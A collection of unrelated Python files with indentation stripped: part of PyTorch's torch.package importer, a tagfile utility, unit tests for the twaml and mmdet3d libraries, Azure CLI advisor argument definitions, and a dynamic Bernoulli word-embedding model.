# TODO: Once we decide to break serialization FC, we can
# stop wrapping with _TypedStorage
return torch.storage._TypedStorage(
wrap_storage=storage._untyped(), dtype=dtype
)
elif typename == "reduce_package":
# to fix BC breaking change, objects on this load path
# will be loaded multiple times erroneously
if len(data) == 2:
func, args = data
return func(self, *args)
reduce_id, func, args = data
if reduce_id not in loaded_reduces:
loaded_reduces[reduce_id] = func(self, *args)
return loaded_reduces[reduce_id]
else:
f"Unknown typename for persistent_load, expected 'storage' or 'reduce_package' but got '{typename}'"
# Load the data (which may in turn use `persistent_load` to load tensors)
data_file = io.BytesIO(self.zip_reader.get_record(pickle_file))
unpickler = self.Unpickler(data_file)
unpickler.persistent_load = persistent_load # type: ignore[assignment]
@contextmanager
def set_deserialization_context():
# to let reduce_package access deserializaiton context
self.storage_context = storage_context
self.last_map_location = map_location
try:
yield
finally:
self.storage_context = None
self.last_map_location = None
with set_deserialization_context():
result = unpickler.load()
# TODO from zdevito:
# This stateful weird function will need to be removed in our efforts
# to unify the format. It has a race condition if multiple python
# threads try to read independent files
torch._utils._validate_loaded_sparse_tensors()
return result
def id(self):
"""
Returns internal identifier that torch.package uses to distinguish :class:`PackageImporter` instances.
Looks like::
<torch_package_0>
"""
return self._mangler.parent_name()
def file_structure(
self, *, include: "GlobPattern" = "**", exclude: "GlobPattern" = ()
) -> Directory:
"""Returns a file structure representation of package's zipfile.
Args:
include (Union[List[str], str]): An optional string e.g. ``"my_package.my_subpackage"``, or optional list of strings
for the names of the files to be inluded in the zipfile representation. This can also be
a glob-style pattern, as described in :meth:`PackageExporter.mock`
exclude (Union[List[str], str]): An optional pattern that excludes files whose name match the pattern.
Returns:
:class:`Directory`
"""
return _create_directory_from_file_list(
self.filename, self.zip_reader.get_all_records(), include, exclude
)
def python_version(self):
"""Returns the version of python that was used to create this package.
Note: this function is experimental and not Forward Compatible. The plan is to move this into a lock
file later on.
Returns:
:class:`Optional[str]` a python version e.g. 3.8.9 or None if no version was stored with this package
"""
python_version_path = ".data/python_version"
return (
self.zip_reader.get_record(python_version_path).decode("utf-8").strip()
if self.zip_reader.has_record(python_version_path)
else None
)
def _read_extern(self):
return (
self.zip_reader.get_record(".data/extern_modules")
.decode("utf-8")
.splitlines(keepends=False)
)
def _make_module(
self, name: str, filename: Optional[str], is_package: bool, parent: str
):
mangled_filename = self._mangler.mangle(filename) if filename else None
spec = importlib.machinery.ModuleSpec(
name,
self, # type: ignore[arg-type]
origin="<package_importer>",
is_package=is_package,
)
module = importlib.util.module_from_spec(spec)
self.modules[name] = module
module.__name__ = self._mangler.mangle(name)
ns = module.__dict__
ns["__spec__"] = spec
ns["__loader__"] = self
ns["__file__"] = mangled_filename
ns["__cached__"] = None
ns["__builtins__"] = self.patched_builtins
ns["__torch_package__"] = True
# Add this module to our private global registry. It should be unique due to mangling.
assert module.__name__ not in _package_imported_modules
_package_imported_modules[module.__name__] = module
# pre-emptively install on the parent to prevent IMPORT_FROM from trying to
# access sys.modules
self._install_on_parent(parent, name, module)
if filename is not None:
assert mangled_filename is not None
# pre-emptively install the source in `linecache` so that stack traces,
# `inspect`, etc. work.
assert filename not in linecache.cache # type: ignore[attr-defined]
linecache.lazycache(mangled_filename, ns)
code = self._compile_source(filename, mangled_filename)
exec(code, ns)
return module
def _load_module(self, name: str, parent: str):
cur: _PathNode = self.root
for atom in name.split("."):
if not isinstance(cur, _PackageNode) or atom not in cur.children:
raise ModuleNotFoundError(
f'No module named "{name}" in self-contained archive "{self.filename}"'
f" and the module is also not in the list of allowed external modules: {self.extern_modules}",
name=name,
)
cur = cur.children[atom]
if isinstance(cur, _ExternNode):
module = self.modules[name] = importlib.import_module(name)
return module
return self._make_module(name, cur.source_file, isinstance(cur, _PackageNode), parent) # type: ignore[attr-defined]
def _compile_source(self, fullpath: str, mangled_filename: str):
source = self.zip_reader.get_record(fullpath)
source = _normalize_line_endings(source)
return compile(source, mangled_filename, "exec", dont_inherit=True)
# note: named `get_source` so that linecache can find the source
# when this is the __loader__ of a module.
def get_source(self, module_name) -> str:
# linecache calls `get_source` with the `module.__name__` as the argument, so we must demangle it here.
module = self.import_module(demangle(module_name))
return self.zip_reader.get_record(demangle(module.__file__)).decode("utf-8")
# note: named `get_resource_reader` so that importlib.resources can find it.
# This is otherwise considered an internal method.
def get_resource_reader(self, fullname):
try:
package = self._get_package(fullname)
except ImportError:
return None
if package.__loader__ is not self:
return None
return _PackageResourceReader(self, fullname)
def _install_on_parent(self, parent: str, name: str, module: types.ModuleType):
if not parent:
return
# Set the module as an attribute on its parent.
parent_module = self.modules[parent]
if parent_module.__loader__ is self:
setattr(parent_module, name.rpartition(".")[2], module)
# note: copied from cpython's import code, with call to create module replaced with _make_module
def _do_find_and_load(self, name):
path = None
parent = name.rpartition(".")[0]
if parent:
if parent not in self.modules:
self._gcd_import(parent)
# Crazy side-effects!
if name in self.modules:
return self.modules[name]
parent_module = self.modules[parent]
try:
path = parent_module.__path__ # type: ignore[attr-defined]
except AttributeError:
msg = (_ERR_MSG + "; {!r} is not a package").format(name, parent)
raise ModuleNotFoundError(msg, name=name) from None
module = self._load_module(name, parent)
self._install_on_parent(parent, name, module)
return module
# note: copied from cpython's import code
def _find_and_load(self, name):
module = self.modules.get(name, _NEEDS_LOADING)
if module is _NEEDS_LOADING:
return self._do_find_and_load(name)
if module is None:
message = "import of {} halted; " "None in sys.modules".format(name)
raise ModuleNotFoundError(message, name=name)
# To handle https://github.com/pytorch/pytorch/issues/57490, where std's
# creation of fake submodules via the hacking of sys.modules is not import
# friendly
if name == "os":
self.modules["os.path"] = cast(Any, module).path
elif name == "typing":
self.modules["typing.io"] = cast(Any, module).io
self.modules["typing.re"] = cast(Any, module).re
return module
def _gcd_import(self, name, package=None, level=0):
"""Import and return the module based on its name, the package the call is
being made from, and the level adjustment.
This function represents the greatest common denominator of functionality
between import_module and __import__. This includes setting __package__ if
the loader did not.
"""
_sanity_check(name, package, level)
if level > 0:
name = _resolve_name(name, package, level)
return self._find_and_load(name)
# note: copied from cpython's import code
def _handle_fromlist(self, module, fromlist, *, recursive=False):
"""Figure out what __import__ should return.
The import_ parameter is a callable which takes the name of module to
import. It is required to decouple the function from assuming importlib's
import implementation is desired.
"""
module_name = demangle(module.__name__)
# The hell that is fromlist ...
# If a package was imported, try to import stuff from fromlist.
if hasattr(module, "__path__"):
for x in fromlist:
if not isinstance(x, str):
if recursive:
where = module_name + ".__all__"
else:
where = "``from list''"
raise TypeError(
f"Item in {where} must be str, " f"not {type(x).__name__}"
)
elif x == "*":
if not recursive and hasattr(module, "__all__"):
self._handle_fromlist(module, module.__all__, recursive=True)
elif not hasattr(module, x):
from_name = "{}.{}".format(module_name, x)
try:
self._gcd_import(from_name)
except ModuleNotFoundError as exc:
# Backwards-compatibility dictates we ignore failed
# imports triggered by fromlist for modules that don't
# exist.
if (
exc.name == from_name
and self.modules.get(from_name, _NEEDS_LOADING) is not None
):
continue
raise
return module
def __import__(self, name, globals=None, locals=None, fromlist=(), level=0):
if level == 0:
module = self._gcd_import(name)
else:
globals_ = globals if globals is not None else {}
package = _calc___package__(globals_)
module = self._gcd_import(name, package, level)
if not fromlist:
# Return up to the first dot in 'name'. This is complicated by the fact
# that 'name' may be relative.
if level == 0:
return self._gcd_import(name.partition(".")[0])
elif not name:
return module
else:
# Figure out where to slice the module's name up to the first dot
# in 'name'.
cut_off = len(name) - len(name.partition(".")[0])
# Slice end needs to be positive to alleviate need to special-case
# when ``'.' not in name``.
module_name = demangle(module.__name__)
return self.modules[module_name[: len(module_name) - cut_off]]
else:
return self._handle_fromlist(module, fromlist)
def _get_package(self, package):
"""Take a package name or module object and return the module.
If a name, the module is imported. If the passed or imported module
object is not a package, raise an exception.
"""
if hasattr(package, "__spec__"):
if package.__spec__.submodule_search_locations is None:
raise TypeError("{!r} is not a package".format(package.__spec__.name))
else:
return package
else:
module = self.import_module(package)
if module.__spec__.submodule_search_locations is None:
raise TypeError("{!r} is not a package".format(package))
else:
return module
def _zipfile_path(self, package, resource=None):
package = self._get_package(package)
assert package.__loader__ is self
name = demangle(package.__name__)
if resource is not None:
resource = _normalize_path(resource)
return f"{name.replace('.', '/')}/{resource}"
else:
return f"{name.replace('.', '/')}"
def _get_or_create_package(
self, atoms: List[str]
) -> "Union[_PackageNode, _ExternNode]":
cur = self.root
for i, atom in enumerate(atoms):
node = cur.children.get(atom, None)
if node is None:
node = cur.children[atom] = _PackageNode(None)
if isinstance(node, _ExternNode):
return node
if isinstance(node, _ModuleNode):
name = ".".join(atoms[:i])
raise ImportError(
f"inconsistent module structure. module {name} is not a package, but has submodules"
)
assert isinstance(node, _PackageNode)
cur = node
return cur
def _add_file(self, filename: str):
"""Assembles a Python module out of the given file. Will ignore files in the .data directory.
Args:
filename (str): the name of the file inside of the package archive to be added
"""
*prefix, last = filename.split("/")
if len(prefix) > 1 and prefix[0] == ".data":
return
package = self._get_or_create_package(prefix)
if isinstance(package, _ExternNode):
raise ImportError(
f"inconsistent module structure. package contains a module file {filename}"
f" that is a subpackage of a module marked external."
)
if last == "__init__.py":
package.source_file = filename
elif last.endswith(".py"):
package_name = last[: -len(".py")]
package.children[package_name] = _ModuleNode(filename)
def _add_extern(self, extern_name: str):
*prefix, last = extern_name.split(".")
package = self._get_or_create_package(prefix)
if isinstance(package, _ExternNode):
return # the shorter extern covers this extern case
package.children[last] = _ExternNode()
_NEEDS_LOADING = object()
_ERR_MSG_PREFIX = "No module named "
_ERR_MSG = _ERR_MSG_PREFIX + "{!r}"
class _PathNode:
pass
class _PackageNode(_PathNode):
def __init__(self, source_file: Optional[str]):
self.source_file = source_file
self.children: Dict[str, _PathNode] = {}
class _ModuleNode(_PathNode):
__slots__ = ["source_file"]
def __init__(self, source_file: str):
self.source_file = source_file
class _ExternNode(_PathNode):
pass
# A private global registry of all modules that have been package-imported.
_package_imported_modules: WeakValueDictionary = WeakValueDictionary()
# `inspect` by default only looks in `sys.modules` to find source files for classes.
# Patch it to check our private registry of package-imported modules as well.
_orig_getfile = inspect.getfile
def patched_getfile(object):
if inspect.isclass(object):
if object.__module__ in _package_imported_modules:
return _package_imported_modules[object.__module__].__file__
return _orig_getfile(object)
inspect.getfile = patched_getfile
class _PackageResourceReader:
"""Private class used to support PackageImporter.get_resource_reader().
Confirms to the importlib.abc.ResourceReader interface. Allowed to access
the innards of PackageImporter.
"""
def __init__(self, importer, fullname):
self.importer = importer
self.fullname = fullname
def open_resource(self, resource):
from io import BytesIO
return BytesIO(self.importer.load_binary(self.fullname, resource))
def resource_path(self, resource):
# The contract for resource_path is that it either returns a concrete
# file system path or raises FileNotFoundError.
if isinstance(
self.importer.zip_reader, DirectoryReader
) and self.importer.zip_reader.has_record(
os.path.join(self.fullname, resource)
):
return os.path.join(
self.importer.zip_reader.directory, self.fullname, resource
)
raise FileNotFoundError
def is_resource(self, name):
path = self.importer._zipfile_path(self.fullname, name)
return self.importer.zip_reader.has_record(path)
def contents(self):
from pathlib import Path
filename = self.fullname.replace(".", "/")
fullname_path = Path(self.importer._zipfile_path(self.fullname))
files = self.importer.zip_reader.get_all_records()
subdirs_seen = set()
for filename in files:
try:
relative = Path(filename).relative_to(fullname_path)
except ValueError:
continue
# If the path of the file (which is relative to the top of the zip
# namespace), relative to the package given when the resource
# reader was created, has a parent, then it's a name in a
# subdirectory and thus we skip it.
parent_name = relative.parent.name
if len(parent_name) == 0:
yield relative.name
elif parent_name not in subdirs_seen:
subdirs_seen.add(parent_name)
yield parent_name
|
# Copyright 2021 Coastal Carolina University
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the “Software”), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import time
def parse_tagfile(filepath, optional=False):
result = []
pick = [ 'ADD' ]
if optional:
pick.append('OPT')
#
with open(filepath, 'r') as fh:
line = fh.readline()
while line:
stripped = line.partition('#')[0].strip()
pieces = stripped.split(':')
if len(pieces) == 2 and pieces[1].strip().upper() in pick:
result.append(pieces[0].strip())
#
line = fh.readline()
#
#
return result
#
def write_tagfile(outpath, names, action='ADD'):
header = '# Tagfile generated ' + time.strftime('%a %b %d %H:%M:%S %Z %Y', time.gmtime())
with open(outpath, 'w') as fh:
fh.write(header + '\n')
for name in names:
fh.write(name + ': ' + action.upper() + '\n')
#
#
#
|
import os
import pandas as pd
import numpy as np
import uproot
import h5py
from twaml.data import dataset
from twaml.data import scale_weight_sum
from twaml.data import from_root, from_pytables, from_h5
branches = ["pT_lep1", "pT_lep2", "eta_lep1", "eta_lep2"]
ds = from_root(
["tests/data/test_file.root"], name="myds", branches=branches, TeXlabel=r"$t\bar{t}$"
)
def test_name():
assert ds.name == "myds"
assert ds.TeXlabel == "$t\\bar{t}$"
def test_no_name():
dst = from_root(["tests/data/test_file.root"], branches=branches)
assert dst.name == "test_file.root"
def test_content():
ts = [uproot.open(f)[ds.tree_name] for f in ds.files]
raws = [t.array("pT_lep1") for t in ts]
raw = np.concatenate([raws])
bins = np.linspace(0, 800, 21)
n1, bins1 = np.histogram(raw, bins=bins)
n2, bins2 = np.histogram(ds.df.pT_lep1.to_numpy(), bins=bins)
np.testing.assert_array_equal(n1, n2)
def test_nothing():
dst = from_root(["tests/data/test_file.root"], branches=branches)
assert dst.files[0].exists()
def test_with_executor():
lds = from_root(["tests/data/test_file.root"], branches=branches, nthreads=4)
np.testing.assert_array_almost_equal(lds.weights, ds.weights, 8)
def test_weight():
ts = [uproot.open(f)[ds.tree_name] for f in ds.files]
raws = [t.array("weight_nominal") for t in ts]
raw = np.concatenate(raws)
raw = raw * 150.0
ds.weights = ds.weights * 150.0
np.testing.assert_array_almost_equal(raw, ds.weights, 6)
def test_add():
ds2 = from_root(["tests/data/test_file.root"], name="ds2", branches=branches)
ds2.weights = ds2.weights * 22
combined = ds + ds2
comb_w = np.concatenate([ds.weights, ds2.weights])
comb_df = pd.concat([ds.df, ds2.df])
np.testing.assert_array_almost_equal(comb_w, combined.weights, 5)
np.testing.assert_array_almost_equal(comb_df.get_values(), combined.df.get_values(), 5)
assert ds.name == combined.name
assert ds.tree_name == combined.tree_name
assert ds.label == combined.label
def test_selection():
ds2 = from_root(
["tests/data/test_file.root"],
name="ds2",
selection="(reg2j2b==True) & (OS == True) & (pT_lep1 > 50)",
)
upt = uproot.open("tests/data/test_file.root")["WtLoop_nominal"]
reg2j2b = upt.array("reg2j2b")
OS = upt.array("OS")
pT_lep1 = upt.array("pT_lep1")
sel = np.logical_and(np.logical_and(reg2j2b, OS), pT_lep1 > 50)
w = upt.array("weight_nominal")[sel]
assert np.allclose(w, ds2.weights)
# np.testing.assert_array_almost_equal(w, ds2.weights)
def test_append():
branches = ["pT_lep1", "pT_lep2", "eta_lep1", "eta_lep2"]
ds1 = from_root(["tests/data/test_file.root"], name="myds", branches=branches)
ds2 = from_root(["tests/data/test_file.root"], name="ds2", branches=branches)
ds2.weights = ds2.weights * 5
# raw
comb_w = np.concatenate([ds1.weights, ds2.weights])
comb_df = pd.concat([ds1.df, ds2.df])
# appended
ds1.append(ds2)
# now test
np.testing.assert_array_almost_equal(comb_w, ds1.weights, 5)
np.testing.assert_array_almost_equal(comb_df.get_values(), ds1.df.get_values(), 5)
def test_auxweights():
branches = ["pT_lep1", "pT_lep2", "eta_lep1", "eta_lep2"]
ds1 = from_root(
["tests/data/test_file.root"],
name="myds",
branches=branches,
auxweights=["phi_lep1", "phi_lep2"],
)
ds2 = from_root(
["tests/data/test_file.root"],
name="ds2",
branches=branches,
auxweights=["phi_lep1", "phi_lep2"],
)
ds1.append(ds2)
dsa = from_root(
["tests/data/test_file.root"],
name="myds",
branches=branches,
auxweights=["phi_lep1", "phi_lep2"],
)
dsb = from_root(
["tests/data/test_file.root"],
name="ds2",
branches=branches,
auxweights=["phi_lep1", "phi_lep2"],
)
dsc = dsa + dsb
np.testing.assert_array_almost_equal(
ds1.auxweights["phi_lep1"], dsc.auxweights["phi_lep1"], 5
)
dsc.change_weights("phi_lep2")
assert dsc.weight_name == "phi_lep2"
pl2 = uproot.open("tests/data/test_file.root")["WtLoop_nominal"].array("phi_lep2")
nw2 = uproot.open("tests/data/test_file.root")["WtLoop_nominal"].array("weight_nominal")
ds2.change_weights("phi_lep2")
np.testing.assert_array_almost_equal(ds2.weights, pl2, 5)
assert "phi_lep2" not in ds2.auxweights
assert "weight_nominal" in ds2.auxweights
ds2.to_pytables("outfile1.h5")
ds2pt = from_pytables("outfile1.h5", "ds2", weight_name="phi_lep2")
print(ds2pt.auxweights)
np.testing.assert_array_almost_equal(ds2pt.auxweights["weight_nominal"].to_numpy(), nw2)
os.remove("outfile1.h5")
assert True
def test_label():
ds2 = from_root(["tests/data/test_file.root"], name="ds2", branches=branches)
assert ds2.label is None
assert ds2.label_asarray() is None
ds2.label = 6
la = ds2.label_asarray()
la_raw = np.ones_like(ds2.weights, dtype=np.int64) * 6
np.testing.assert_array_equal(la, la_raw)
def test_auxlabel():
ds2 = from_root(["tests/data/test_file.root"], name="ds2", branches=branches)
assert ds2.auxlabel is None
assert ds2.auxlabel_asarray() is None
ds2.auxlabel = 3
assert ds2.auxlabel == 3
la = ds2.auxlabel_asarray()
la_raw = np.ones_like(ds2.weights, dtype=np.int64) * 3
np.testing.assert_array_equal(la, la_raw)
def test_save_and_read():
ds.to_pytables("outfile.h5")
new_ds = from_pytables("outfile.h5", ds.name)
X1 = ds.df.to_numpy()
X2 = new_ds.df.to_numpy()
w1 = ds.weights
w2 = new_ds.weights
np.testing.assert_array_almost_equal(X1, X2, 6)
np.testing.assert_array_almost_equal(w1, w2, 6)
def test_raw_h5():
inds = from_h5("tests/data/raw.h5", "WtLoop_nominal", ["pT_jet1", "nbjets", "met"])
rawf = h5py.File("tests/data/raw.h5")["WtLoop_nominal"]
raww = rawf["weight_nominal"]
rawm = rawf["met"]
np.testing.assert_array_almost_equal(raww, inds.weights, 5)
np.testing.assert_array_almost_equal(rawm, inds.df.met, 5)
def test_scale_weight_sum():
ds1 = from_root(["tests/data/test_file.root"], name="myds", branches=branches)
ds2 = from_root(["tests/data/test_file.root"], name="ds2", branches=branches)
ds2.weights = np.random.randn(len(ds1)) * 10
scale_weight_sum(ds1, ds2)
testval = abs(1.0 - ds2.weights.sum() / ds1.weights.sum())
assert testval < 1.0e-4
def test_cleanup():
os.remove("outfile.h5")
assert True
def test_columnkeeping():
ds1 = from_root(
["tests/data/test_file.root"],
name="myds",
branches=["met", "sumet", "pT_jet2", "reg2j2b"],
auxweights=["pT_lep1", "pT_lep2", "pT_jet1"],
)
keep_c = ["reg2j2b", "pT_jet2"]
keep_w = ["pT_lep1", "pT_jet1"]
ds1.keep_columns(keep_c)
ds1.keep_weights(keep_w)
list_of_col = list(ds1.df.columns)
list_of_exw = list(ds1.auxweights.columns)
assert keep_c == list_of_col
assert keep_w == list_of_exw
def test_columnrming():
ds1 = from_root(
["tests/data/test_file.root"],
name="myds",
branches=["met", "sumet", "pT_jet2", "reg2j2b"],
auxweights=["pT_lep1", "pT_lep2", "pT_jet1"],
)
ds1.rm_columns(["met", "sumet"])
list_of_cols = list(ds1.df.columns)
assert len(list_of_cols) == 2 and "pT_jet2" in list_of_cols and "reg2j2b" in list_of_cols
ds1 = from_root(["tests/data/test_file.root"], name="myds")
list_of_cols = list(ds1.df.columns)
assert "OS" in list_of_cols
assert "SS" in list_of_cols
assert "elmu" in list_of_cols
assert "elel" in list_of_cols
assert "mumu" in list_of_cols
list_of_regs = [reg for reg in list_of_cols if "reg" in reg]
ds1.rm_chargeflavor_columns()
ds1.rm_region_columns()
ds1.rm_weight_columns()
list_of_cols_after = list(ds1.df.columns)
assert "OS" not in list_of_cols_after
assert "SS" not in list_of_cols_after
assert "elmu" not in list_of_cols_after
assert "mumu" not in list_of_cols_after
assert "elel" not in list_of_cols_after
assert "reg1j1b" not in list_of_cols_after
for r in list_of_regs:
assert r not in list_of_cols_after
def test_selected_datasets():
ds2 = from_root(
"tests/data/test_file.root", auxweights=["pT_lep1", "pT_lep2", "pT_jet1"], name="myds"
)
splits = ds2.selected_datasets(
{"s1": "(pT_lep2 > 30) & (pT_jet1 < 50)", "s2": "(reg2j1b==True)"}
)
t = uproot.open("tests/data/test_file.root")["WtLoop_nominal"]
pT_lep2_g30 = t.array("pT_lep2") > 30
pT_jet1_l50 = t.array("pT_jet1") < 50
reg2j1b_ist = t.array("reg2j1b") == True
pT_lep1 = t.array("pT_lep1")
s1_pT_lep1 = splits["s1"].df.pT_lep1.to_numpy()
s2_pT_lep1 = splits["s2"].df.pT_lep1.to_numpy()
pT_lep1_manual_s1 = pT_lep1[pT_lep2_g30 & pT_jet1_l50]
pT_lep1_manual_s2 = pT_lep1[reg2j1b_ist]
np.testing.assert_allclose(s1_pT_lep1, pT_lep1_manual_s1)
np.testing.assert_allclose(s2_pT_lep1, pT_lep1_manual_s2)
def test_selection_masks():
ds2 = from_root(
"tests/data/test_file.root",
auxweights=["pT_lep1", "pT_lep2", "pT_jet1"],
name="myds",
)
masks, sels = ds2.selection_masks(
{"s1": "(pT_lep2 > 30) & (pT_jet1 < 50)", "s2": "(reg2j1b==True)"}
)
t = uproot.open("tests/data/test_file.root")["WtLoop_nominal"]
pT_lep2_g30 = t.array("pT_lep2") > 30
pT_jet1_l50 = t.array("pT_jet1") < 50
reg2j1b_ist = t.array("reg2j1b") == True
pT_lep1 = t.array("pT_lep1")
s1_pT_lep1 = ds2[masks["s1"]].df.pT_lep1.to_numpy()
s2_pT_lep1 = ds2[masks["s2"]].df.pT_lep1.to_numpy()
pT_lep1_manual_s1 = pT_lep1[pT_lep2_g30 & pT_jet1_l50]
pT_lep1_manual_s2 = pT_lep1[reg2j1b_ist]
np.testing.assert_allclose(s1_pT_lep1, pT_lep1_manual_s1)
np.testing.assert_allclose(s2_pT_lep1, pT_lep1_manual_s2)
|
# Copyright (c) OpenMMLab. All rights reserved.
import numpy as np
import pytest
import torch
def test_dgcnn_gf_module():
if not torch.cuda.is_available():
pytest.skip()
from mmdet3d.ops import DGCNNGFModule
self = DGCNNGFModule(
mlp_channels=[18, 64, 64],
num_sample=20,
knn_mod='D-KNN',
radius=None,
norm_cfg=dict(type='BN2d'),
act_cfg=dict(type='ReLU'),
pool_mod='max').cuda()
assert self.mlps[0].layer0.conv.in_channels == 18
assert self.mlps[0].layer0.conv.out_channels == 64
xyz = np.fromfile('tests/data/sunrgbd/points/000001.bin', np.float32)
# (B, N, C)
xyz = torch.from_numpy(xyz).view(1, -1, 3).cuda()
points = xyz.repeat([1, 1, 3])
# test forward
new_points = self(points)
assert new_points.shape == torch.Size([1, 200, 64])
# test F-KNN mod
self = DGCNNGFModule(
mlp_channels=[6, 64, 64],
num_sample=20,
knn_mod='F-KNN',
radius=None,
norm_cfg=dict(type='BN2d'),
act_cfg=dict(type='ReLU'),
pool_mod='max').cuda()
# test forward
new_points = self(xyz)
assert new_points.shape == torch.Size([1, 200, 64])
# test ball query
self = DGCNNGFModule(
mlp_channels=[6, 64, 64],
num_sample=20,
knn_mod='F-KNN',
radius=0.2,
norm_cfg=dict(type='BN2d'),
act_cfg=dict(type='ReLU'),
pool_mod='max').cuda()
def test_dgcnn_fa_module():
if not torch.cuda.is_available():
pytest.skip()
from mmdet3d.ops import DGCNNFAModule
self = DGCNNFAModule(mlp_channels=[24, 16]).cuda()
assert self.mlps.layer0.conv.in_channels == 24
assert self.mlps.layer0.conv.out_channels == 16
points = [torch.rand(1, 200, 12).float().cuda() for _ in range(3)]
fa_points = self(points)
assert fa_points.shape == torch.Size([1, 200, 40])
def test_dgcnn_fp_module():
if not torch.cuda.is_available():
pytest.skip()
from mmdet3d.ops import DGCNNFPModule
self = DGCNNFPModule(mlp_channels=[24, 16]).cuda()
assert self.mlps.layer0.conv.in_channels == 24
assert self.mlps.layer0.conv.out_channels == 16
xyz = np.fromfile('tests/data/sunrgbd/points/000001.bin',
np.float32).reshape((-1, 6))
# (B, N, 3)
xyz = torch.from_numpy(xyz).view(1, -1, 3).cuda()
points = xyz.repeat([1, 1, 8]).cuda()
fp_points = self(points)
assert fp_points.shape == torch.Size([1, 200, 16])
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from knack.arguments import CLIArgumentType
from azure.cli.core.commands.parameters import get_enum_type
from ._validators import validate_include_or_exclude, validate_ids_or_resource_group
def load_arguments(self, _):
ids_arg_type = CLIArgumentType(nargs='+', options_list=['--ids'],
help='One or more resource IDs (space delimited). If provided, no other '
'"Resource Id" arguments should be specified.')
with self.argument_context('advisor recommendation list') as c:
c.argument('ids', ids_arg_type, validator=validate_ids_or_resource_group)
c.argument('category', options_list=['--category', '-c'], help='Name of recommendation category.',
arg_type=get_enum_type(['Cost', 'HighAvailability', 'Performance', 'Security']))
with self.argument_context('advisor recommendation disable') as c:
c.argument('ids', ids_arg_type)
c.argument('days', options_list=['--days', '-d'], type=int,
help='Number of days to disable. If not specified, the recommendation is disabled forever.')
with self.argument_context('advisor recommendation enable') as c:
c.argument('ids', ids_arg_type)
with self.argument_context('advisor configuration set') as c:
c.argument('low_cpu_threshold', options_list=['--low-cpu-threshold', '-l'],
help='Value for low CPU threshold.', arg_type=get_enum_type(['5', '10', '15', '20']))
c.argument('exclude', options_list=['--exclude', '-e'], action='store_true',
help='Exclude from recommendation generation.')
c.argument('include', options_list=['--include', '-i'], action='store_true',
help='Include in recommendation generation.', validator=validate_include_or_exclude)
|
"""Contains embedding model implementation"""
import numpy as np
import torch
import torch.nn as nn
from torch.distributions.categorical import Categorical
class DynamicBernoulliEmbeddingModel(nn.Module):
def __init__(
self,
V,
T,
m_t,
dictionary,
sampling_distribution,
k=50,
lambda_=1e4,
lambda_0=1,
ns=20,
):
"""
Parameters
----------
V : int
Vocabulary size.
T : int
Number of timesteps.
m_t : dict
The total number of tokens in each timestep to compute the scaling factor
for the pseudo log likelihoods.
dictionary : dict
Maps word to index.
sampling_distribution : tensor (V,)
The unigram distribution to use for negative sampling.
k : int
Embedding dimension.
lambda_ : int
Scaling factor on the time drift prior.
lambda_0 : int
Scaling factor on the embedding priors.
ns : int
Number of negative samples.
"""
super().__init__()
self.V = V # Vocab size.
self.T = T # Number of timestepss.
self.k = k # Embedding dimension.
self.total_tokens = sum(m_t.values()) # Used for scaling factor for pseudo LL
self.lambda_ = lambda_ # Scaling factor on the time drift prior.
self.lambda_0 = lambda_0 # Scaling factor on the embedding priors.
self.sampling_distribution = Categorical(logits=sampling_distribution)
self.negative_samples = ns # Number of negative samples.
self.dictionary = dictionary
self.dictionary_reverse = {v: k for k, v in dictionary.items()}
# Embeddings parameters.
self.rho = nn.Embedding(V * T, k) # Stacked dynamic embeddings
self.alpha = nn.Embedding(V, k) # Time independent context embeddings
with torch.no_grad():
nn.init.normal_(self.rho.weight, 0, 0.01)
nn.init.normal_(self.alpha.weight, 0, 0.01)
# Transformations
self.log_sigmoid = nn.LogSigmoid()
self.sigmoid = nn.Sigmoid()
def L_pos(self, eta):
return self.log_sigmoid(eta).sum()
def L_neg(self, batch_size, times, contexts_summed):
neg_samples = self.sampling_distribution.sample(
torch.Size([batch_size, self.negative_samples])
)
neg_samples = neg_samples + (times * self.V).reshape((-1, 1))
neg_samples = neg_samples.T.flatten()
context_flat = contexts_summed.repeat((self.negative_samples, 1))
eta_neg = (self.rho(neg_samples) * context_flat).sum(axis=1)
return (torch.log(1 - self.sigmoid(eta_neg) + 1e-7)).sum()
def forward(self, targets, times, contexts, validate=False, dynamic=True):
"""Forward pass of the model
Parameters
----------
targets : (batch_size,)
times : (batch_size,)
contexts : (batch_size, 2 * context_size)
dynamic : bool
Indicates whether to include the drift component of the loss.
Returns
-------
loss
L_pos
L_neg
L_prior
"""
batch_size = targets.shape[0]
# Since the embeddings are stacked, adjust the indices for the targets.
# In other words, word `i` in time slice `j` would be at position
# `j * V + i` in the embedding matrix where V is the vocab size.
targets_adjusted = times * self.V + targets
# -1 indicates out of bounds for the context word, so mask these out so
# they don't contribute to the context sum.
context_mask = contexts == -1
contexts[context_mask] = 0
contexts = self.alpha(contexts)
contexts[context_mask] = 0
contexts_summed = contexts.sum(axis=1)
eta = (self.rho(targets_adjusted) * contexts_summed).sum(axis=1)
# Loss
loss, L_pos, L_neg, L_prior = None, None, None, None
L_pos = self.L_pos(eta)
if not validate:
L_neg = self.L_neg(batch_size, times, contexts_summed)
loss = (self.total_tokens / batch_size) * (L_pos + L_neg)
L_prior = -self.lambda_0 / 2 * (self.alpha.weight ** 2).sum()
L_prior += -self.lambda_0 / 2 * (self.rho.weight[0] ** 2).sum()
if dynamic:
rho_trans = self.rho.weight.reshape((self.T, self.V, self.k))
L_prior += (
-self.lambda_ / 2 * ((rho_trans[1:] - rho_trans[:-1]) ** 2).sum()
)
loss += L_prior
loss = -loss
